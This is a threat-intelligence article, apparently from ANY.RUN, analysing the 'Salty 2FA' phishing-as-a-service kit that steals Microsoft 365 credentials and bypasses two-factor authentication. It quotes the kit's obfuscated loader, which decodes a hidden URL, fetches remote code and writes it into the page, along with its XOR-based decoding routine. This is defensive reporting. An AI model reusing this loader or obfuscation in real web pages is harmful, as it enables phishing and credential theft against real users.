A sophisticated new Phishing-as-a-Service (PhaaS) framework dubbed “Salty 2FA” has emerged as a significant threat to Microsoft 365 users across US and European industries.
This previously undocumented platform employs advanced obfuscation techniques and multi-stage execution chains specifically designed to bypass two-factor authentication mechanisms while stealing corporate credentials.
The framework targets organizations spanning finance, telecommunications, energy, logistics, and educational sectors through carefully crafted phishing campaigns.
The malware distinguishes itself through a unique domain infrastructure pattern that combines compound domains in “.com” zones with domains registered under Russian “.ru” top-level domains.
.webp "New Salty 2FA PhaaS platform Attacking Microsoft 365 Users to Steal Login Credentials 3")
This distinctive pairing creates a complex web of redirections and payload delivery mechanisms that have helped the platform evade traditional detection systems.
Victims receive phishing emails containing various lures including fake voice messages, document access requests, and billing statements that redirect them to convincing Microsoft login replicas.
ANY.RUN analysts identified this previously unknown PhaaS framework during routine phishing campaign hunting when they discovered multiple sandbox sessions exhibiting similar behavioral patterns despite using different domains and obfuscation techniques.
.webp "New Salty 2FA PhaaS platform Attacking Microsoft 365 Users to Steal Login Credentials 4")
The consistent use of Cloudflare Turnstile protection combined with the distinctive domain pairing initially flagged these campaigns as potentially related, leading to the comprehensive analysis that revealed Salty 2FA’s full capabilities.
The platform demonstrates concerning sophistication in its ability to intercept and process multiple two-factor authentication methods, including push notifications, SMS codes, voice calls, and authenticator app tokens.
This capability extends the attack beyond simple credential theft, allowing threat actors to maintain persistent access to compromised accounts even when traditional 2FA protections are in place.
Multi-Stage Execution Chain and Obfuscation Techniques
Salty 2FA’s technical architecture relies on a carefully orchestrated five-stage execution process designed to resist analysis and detection.
.webp "New Salty 2FA PhaaS platform Attacking Microsoft 365 Users to Steal Login Credentials 5")
The initial stage begins with an obfuscated JavaScript function that serves as the entry point, containing inspirational quote comments as noise to complicate static analysis.
async function vitals() {
function whiz (math) {
return [...atob (math)].map((lewd, matchmaking, recklessness) =>
recklessness[0] ? String.fromCharCode((lewd.charCodeAt(0)-
recklessness[0].charCodeAt(0)+256)%256):"").join("");
}
if(sessionStorage[0]){
document.write(whiz(sessionStorage[0]));
return;
}
unearned = await(await fetch(await whiz(`1PwICAQHzsPDAfUG//kIBAD19/nGyPn9wgYJw8M=`))).text();
document.write(await whiz(unearned));
sessionStorage[0] = unearned;
}The framework employs sophisticated element ID encoding using Base64 and XOR operations with a fixed generated value, making dynamic analysis significantly more challenging.
All front-end logic relies on jQuery calls to dynamically generated element identifiers, which must be decoded through a dedicated routine before manipulation.
function decode(s) {
try {
var r="";
r = atob(s);
var d = '';
for (var i = 0; i < r.length; i++) {
d += String.fromCharCode(r.charCodeAt(i) ^
'b03e37d4502862adc85953d8ea0c4b6a'.charCodeAt(i %
'b03e37d4502862adc85953d8ea0c4b6a'.length));
}
return d;
} catch (e) {
return s;
}
}The platform incorporates multiple anti-analysis mechanisms including keyboard shortcut blocking for debugging tools and execution time measurement to detect controlled environments.
Data exfiltration utilizes the same XOR technique with session-derived keys, while stolen credentials are transmitted to Russian-hosted servers through encoded POST requests containing both the encrypted data and decoding parameters.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
